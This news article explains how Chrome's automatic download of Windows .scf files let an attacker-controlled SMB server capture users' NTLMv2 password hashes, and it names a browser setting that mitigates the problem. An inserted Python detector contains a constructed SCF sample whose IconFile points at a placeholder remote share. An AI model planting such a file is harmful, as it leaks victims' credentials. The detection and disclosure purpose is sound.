DefenseCode has published a paper that details an attack that leads to Windows credentials theft, affecting the most popular browser in the world, Google Chrome, as well as all Windows versions supporting it.
Here is how it works:
It starts by tricking a Chrome user into downloading a Windows Explorer Shell Command File (.scf) that can be used to trick Windows into an authentication attempt to an attacker-controlled remote SMB server, which is designed to capture the victim's Microsoft LAN Manager (NTLMv2) user password hash.
The hash can be cracked offline or used to impersonate the victim on a service that accepts the same kind of NTLM-based authentication.
Windows Explorer Shell Command File, or SCF (.scf), is a lesser-known file type going back as far as Windows 98, primarily used as a Show Desktop shortcut. It is basically a text file with two sections, one to determine a command to be run and one to indicate the location of the icon file, such as:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
It can be easily altered to trick Windows into an authentication attempt to a remote SMB server, like below:
The request is triggered the very moment the download directory is opened in Windows File Explorer. There is no need to click or open the downloaded file, since Windows File Explorer will automatically try to retrieve the 'icon'.
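As an added example (not code from the DefenseCode paper or this article), a small Python check that parses an SCF file the way the format above is laid out and flags an IconFile entry that would be fetched from a remote host, which is the condition a download-folder or mail-gateway scanner would want to detect. Both samples are constructed here; the host name in the suspicious one is a placeholder, not a real server.

```python
import re

# Constructed sample: the legitimate "Show Desktop" SCF shown in the article.
BENIGN_SCF = """[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""

# Constructed sample: same file, but IconFile points at a UNC path.
# PLACEHOLDER-HOST is a made-up name used only for this check.
SUSPICIOUS_SCF = """[Shell]
Command=2
IconFile=\\\\PLACEHOLDER-HOST\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

UNC_RE = re.compile(r"^\\\\[^\\]+\\")          # \\host\share\...
URL_RE = re.compile(r"^(file|smb)://", re.I)   # file://host/... resolves remotely too

def parse_scf(text):
    """Parse the INI-like SCF layout into {section: {key: value}} (keys lower-cased)."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def icon_target(scf):
    """IconFile is written as 'path,index'; return only the path part."""
    value = scf.get("shell", {}).get("iconfile", "")
    return value.rsplit(",", 1)[0].strip().strip('"')

def is_remote_icon(text):
    """True when Explorer would contact another host to render this file's icon."""
    path = icon_target(parse_scf(text))
    return bool(UNC_RE.match(path) or URL_RE.match(path))
```

Run over every .scf in a download directory, a hit on is_remote_icon is the case the article describes: an icon lookup that forces an outbound SMB authentication before the user has opened anything.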
So why is this Google Chrome's fault?
By default, Chrome will automatically download files that it deems safe without prompting the user for a download location. Chrome considers SCF files to be on the safe side of the table, so it does not sanitize them as it does LNK files. As the paper states:
From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?
Competing browsers such as IE, Microsoft Edge, Firefox, and Safari do not allow the automatic download of SCF files.
While Google is working on a solution to fix the issue, DefenseCode suggests making the following change to disable automatic downloads in Google Chrome:
Settings > Show advanced settings, then check the option "Ask where to save each file before downloading" under the Downloads section.